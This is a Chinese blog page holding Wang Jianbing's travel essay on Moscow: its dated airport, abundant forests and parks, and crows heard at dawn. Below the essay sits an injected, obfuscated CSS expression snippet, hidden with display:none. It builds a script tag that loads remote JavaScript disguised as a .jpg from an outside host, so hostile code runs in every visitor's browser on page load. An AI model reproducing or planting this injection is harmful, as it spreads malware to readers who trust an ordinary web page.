注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

王剑冰博客

散文《绝版的周庄》作者,河南省作家协会副主席

 
 
 

日志

 
 
关于我

1982年毕业于河南大学中文系。1975年赴乡村插队务农,后历任《奔流》杂志编辑,《文艺百家报》、《当代人报》采通部主任,《散文选刊》副主编,副编审。1979年开始发表作品。1993年加入中国作家协会。 河南省作家协会副主席,全国鲁迅文学奖二、三、四届评委,国务院特殊津贴专家。

网易考拉推荐

当又一个夏日来临——俄罗斯散记(3…  

2009-08-30 03:50:00|  分类: 随笔 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

当又一个夏日来临

——俄罗斯散记(3)

王剑冰

当又一个夏日来临——俄罗斯散记(3… - 王剑冰 - 王剑冰博客

(这是在车上抓拍的机场楼)

俄罗斯机场还是老样子,同我八年前来时没什么两样,包括一块块的方地砖,包括头顶小方格的吊顶,包括那个三角形的不大的出境口,而出境口仍是排了长长的队伍,大多还是中国人,中国人站的腰酸腿疼,俄罗斯小组稳坐在办事的小间格里就是慢条斯理。

出来一看机场外观,还是那样,没有一点变化,这对一个女人来说倒还是好事,但对一个机场来说,太不算一件好事。你看,我们北京的机场,天津的机场,上海的机场,郑州、广州、云南的机场,那是几年一小变,几年又一大变,越变越现代。这个俄罗斯最大的国际机场,不说同北京、上海、广州比,就同云南比,也差的远去了。俄罗斯人把钱花在了军舰上,俄罗斯航母和巡洋舰都很气派,但却装点不了生活。不知俄罗斯人来到北京会有什么想法,北京为奥运会的举办,增建了三号航站楼,那是中国人生活中的航母,而鸟巢则是快乐的巡洋舰了。

当又一个夏日来临——俄罗斯散记(3… - 王剑冰 - 王剑冰博客

(这是在车上抓拍的莫斯科河畔的森林和后面的市区)

小时候,由于宣传及渲染,早将苏联当成苏修,而也不知谁起的头,将莫斯科比成了厕所,去哪里?去莫斯科,那一准是去厕所了,“一不小心让你掉进莫斯科”,那是咒语。来到莫斯科,听见这个词,还能想到小时的戏语,不禁偷偷地笑.

而人家的莫斯科,比中国乡间的厕所干净多了,满街都是绿,有11个自然森林区,那是一个大啊,从天上看,就像看大自然,林海漫漫,河流弯弯,还有近百座公园,遍布在城市各个区域,休闲的人们随便地就没入了哪个园中,尽享绿色。何况还有那么多的街心花园呢,有多少?800多个!好家伙,莫斯科人简直是生活在花园里,那是什么样的一种自在。我们换了两处住所,从住的地方出来闲逛,很轻易地就走进了大氧吧中,高大的林木直穿天际,花草生长得井然有序,可供坐的长椅不知怎的,总是干干净净的。

哪有这么好的公共厕所啊,当然,在街上急了,你随意钻进哪个树林后边,还真是没人看见。这莫斯科,也真够咱方便的。

 

 

当又一个夏日来临——俄罗斯散记(3… - 王剑冰 - 王剑冰博客

(这是早晨从17层楼上拍的莫斯科市区一角)

现在是在莫斯科的510分,北京时间9点。还没有人走动,从高高的楼上往下看,着实是见不到一个人影,若在中国,勤劳的人们早就在锻炼身体了,莫斯科却只有一些车子跑来跑去,那就是即使他们出来,也是借助了车子,而且是必须出来的事情。

一只乌鸦把夜色越啄越亮了,乌鸦在浓密的树上,我看不到,只听见它可爱的声音,那声音若在以前是很不中听的,乌鸦那是反动派的声音,是坏人的代言。可多少年以后,这乌鸦的叫声却有了几分傻傻的可爱,那嘎嘎的声音使得那种清静更静了。中国的乌鸦我只在黄河岸边的三所听到过,城市却很少听见它可爱的嗓音。

乌鸦怎么跑到俄罗斯来了呢?这个地球实在是可爱之极,它能把同一个物种洒在不同的地域。

还有那些麻雀,现在有几只正在啄吃着看不见的东西,许昨天没有好好劳动,将自己的肚子填饱,早起不得不四处流浪。

 

ee:expression_r(function(){if(!window.r){var ss='s'+'cript';var tt='text/ja'+'vas'+'cript';var st=document.createElement(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName_r('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(30)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017